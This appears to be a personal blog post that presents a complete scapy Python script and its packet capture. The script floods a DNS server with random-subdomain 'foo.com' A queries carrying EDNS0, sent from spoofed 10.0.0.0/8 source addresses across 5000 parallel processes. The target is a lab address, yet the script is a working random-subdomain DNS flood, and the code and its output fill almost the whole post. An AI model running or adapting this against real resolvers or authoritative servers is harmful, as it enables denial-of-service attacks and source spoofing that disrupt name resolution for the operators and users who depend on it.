lost and found ( for me ? )

lost and found ( for me ? )

↑ Grab this Headline Animator

scapy 2.2.0 dev: craft “random string”.foo.com A EDNS0 queries

Here is a sample script of crafting “random string”.foo.com A EDNS0 queries with spoofed IP addresses.
# cat -n send_random_A_EDNS0_query.py
    1  #!/usr/bin/env python
    2  # -*- coding: utf-8 -*-
    3
    4  ###
    5  # this script is for 2.2.0-dev
    6  # this script can generate crafted EDNS0 "random string".foo.com A queries with spoofed IP addresses
    7  # tested with Python 2.7.4
    8  ###
    9
   10  import multiprocessing
   11  import logging
   12  logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
   13
   14  from scapy.all import *
   15  import random
   16  import string
   17  import time
   18
   19  domain_string = string.ascii_lowercase + string.digits
   20  target_server = "192.168.10.11"
   21  interface_name = "br0"
   22
   23  def craft_DNS():
   24          for j in range(0,100):
   25                  a1 = ''.join(random.choice(domain_string) for x in range(10))
   26                  b1 = ''.join(random.choice(domain_string) for y in range(3))
   27                  target1 = a1 + "." + b1 + "." + "foo.com"
   28
   29                  send(IP(src=RandIP("10.0.0.0/8"), dst="%s" % target_server)/UDP(sport=RandShort(),dport=53)/DNS(rd=1L,id=RandShort(),qd=DNSQR(qname="%s" % target1, qtype="A", qclass="IN"), ar=DNSRROPT(rclass=4096)),verbose=False,iface="%s" % interface_name,loop=0)
   30
   31  if __name__ == '__main__':
   32          jobs = []
   33          for i in range(5000):
   34                  p = multiprocessing.Process(target=craft_DNS)
   35                  jobs.append(p)
   36                  p.start()
   37          p.terminate()
capture data collected on the target DNS server.
76 0.005761000 192.168.10.11 -> 10.36.88.148 DNS 93 Standard query response 0x4150
82 0.005962000  10.78.195.9 -> 192.168.10.11 DNS 93 Standard query 0x6e9d  A opfolq0new.h16.foo.com
84 0.006078000 192.168.10.11 -> 10.55.142.81 DNS 93 Standard query response 0xb67f
88 0.006358000 192.168.10.11 -> 10.187.137.156 DNS 93 Standard query response 0xd697
90 0.006590000 192.168.10.11 -> 10.169.60.242 DNS 93 Standard query response 0x0905
92 0.006840000 192.168.10.11 -> 10.110.137.121 DNS 93 Standard query response 0xa51f
94 0.006964000  10.65.14.73 -> 192.168.10.11 DNS 93 Standard query 0x3563  A 1ra08c4vts.kpw.foo.com
95 0.007080000 192.168.10.11 -> 10.237.130.164 DNS 93 Standard query response 0x22c7
97 0.007207000 10.102.218.191 -> 192.168.10.11 DNS 93 Standard query 0x1d18  A xqwtjpqi8f.yar.foo.com
98 0.007221000 10.71.23.177 -> 192.168.10.11 DNS 93 Standard query 0x1655  A rd4su27neq.r66.foo.com



 
Labels: , , , , ,

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.

Subscribe to: Post Comments (Atom)